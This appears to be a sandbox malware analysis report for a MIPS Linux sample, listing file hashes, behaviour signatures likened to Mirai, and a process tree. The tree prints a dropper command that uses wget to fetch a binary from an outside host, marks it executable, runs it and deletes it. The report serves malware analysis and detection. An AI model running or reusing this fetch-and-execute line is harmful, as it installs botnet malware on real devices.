Overview

overview

10

Static

static

10

16f7510abd...7068b2

debian-9-mips

7

Analysis

  • max time kernel
    148s
  • max time network
    140s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20231215-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20231215-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    30-12-2023 11:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    16f7510abd7b8c72c34a98695f7068b2

  • Size

    155KB

  • MD5

    16f7510abd7b8c72c34a98695f7068b2

  • SHA1

    390a4994692c9277b0cda11cdb9e22a1b9794c4c

  • SHA256

    ded5c5c84ddd2cc38f7a1f7f574b4b72fdbf4f72a99ab0e82ea544408b61e617

  • SHA512

    c5954f48ee5f531f6c783a6fbec7f92f7624ee42a7cb53bbf6c9963fe98f3734b23482adb799ca7351b266dde4b46c083954bb653e4c3034b37a94d0608de360

  • SSDEEP

    3072:B7esBFP23rWfOB7ZOOyG/WKmrThPaLEne7rNb:1euCloG/rmrThPaLEne7rNb

Score
7/10

Malware Config

Signatures

  • Changes its process name 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Reads system routing table 1 TTPs 1 IoCs

    Gets active network interfaces from /proc virtual filesystem.

  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/16f7510abd7b8c72c34a98695f7068b2
    /tmp/16f7510abd7b8c72c34a98695f7068b2
    1⤵
    • Changes its process name
    • Reads system routing table
    • Reads system network configuration
    PID:709
    • /bin/sh
      /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
      2⤵
        PID:715
        • /usr/bin/wget
          wget -q http://gay.energy/.../vivid -O .....
          3⤵
          • Writes file to tmp directory
          PID:720
        • /bin/chmod
          chmod 777 .....
          3⤵
            PID:732
          • /tmp/.....
            ./.....
            3⤵
            • Executes dropped EXE
            PID:733
          • /bin/sh
            /bin/sh ./.....
            3⤵
              PID:733
            • /bin/rm
              rm -rf .....
              3⤵
                PID:735

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads